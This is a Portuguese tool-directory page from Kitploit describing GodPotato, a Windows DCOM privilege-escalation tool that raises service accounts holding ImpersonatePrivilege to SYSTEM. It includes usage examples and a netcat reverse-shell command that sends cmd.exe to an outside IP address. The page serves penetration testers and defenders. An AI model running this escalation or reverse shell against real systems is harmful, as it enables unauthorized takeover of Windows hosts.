Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
GodPotato — Ferramenta de escalonamento de privilégios baseada em DCOM para Windows Server 2012-2022 e Windows 8-11, elevando usuários com ImpersonatePrivilege para NT AUTHORITY\SYSTEM via vulnerabilidade rpcss oxid. | Kitploit
Ferramentas/GitHubGitHub/beichendream/godpotato
Escalada de PrivilégiosExploraçãoPós-ExploraçãoTestes de Penetração
GitHubbeichendream/godpotato

GodPotato

Ferramenta de escalonamento de privilégios baseada em DCOM para Windows Server 2012-2022 e Windows 8-11, elevando usuários com ImpersonatePrivilege para NT AUTHORITY\SYSTEM via vulnerabilidade rpcss oxid.

Ver Repositório
2.3k27329há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

GodPotato

Baseando-se no histórico de escalada de privilégios Potato por 6 anos, desde o início do RottenPotato até o fim do JuicyPotatoNG, descobri uma nova tecnologia pesquisando o DCOM, que possibilita a escalada de privilégios no Windows 2012 - Windows 2022, agora, desde que você tenha permissão "ImpersonatePrivilege". Então você é "NT AUTHORITY\SYSTEM". Geralmente, serviços WEB e de banco de dados possuem permissões "ImpersonatePrivilege".

A escalada de privilégios Potato é geralmente usada quando obtemos privilégios WEB/banco de dados. Podemos elevar um usuário de serviço com privilégios baixos para "NT AUTHORITY\SYSTEM". No entanto, o Potato histórico não tem como rodar nos sistemas Windows mais recentes. Quando eu estava pesquisando DCOM, encontrei um novo método que pode realizar escalada de privilégios. Existem algumas falhas no rpcss ao lidar com oxid, e o rpcss é um serviço que deve estar aberto pelo sistema. Portanto, pode rodar em praticamente qualquer sistema operacional Windows, eu o nomeei GodPotato.

Versão afetada

Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11

Exemplo

root@kitploit:~

    FFFFF                   FFF  FFFFFFF
   FFFFFFF                  FFF  FFFFFFFF
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF

Argumentos:

        -cmd Obrigatório:True Linha de Comando (default cmd /c whoami)

Exemplo:

GodPotato -cmd "cmd /c whoami"

Use o Clsid embutido do programa para escalada de privilégios e execute um comando simples

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Customize o Clsid e execute comandos

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Execute comandos de shell reverso

root@kitploit:~
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

Agradecimentos

zcgonvh

skay

Licença

Apache License 2.0

Baixar ferramenta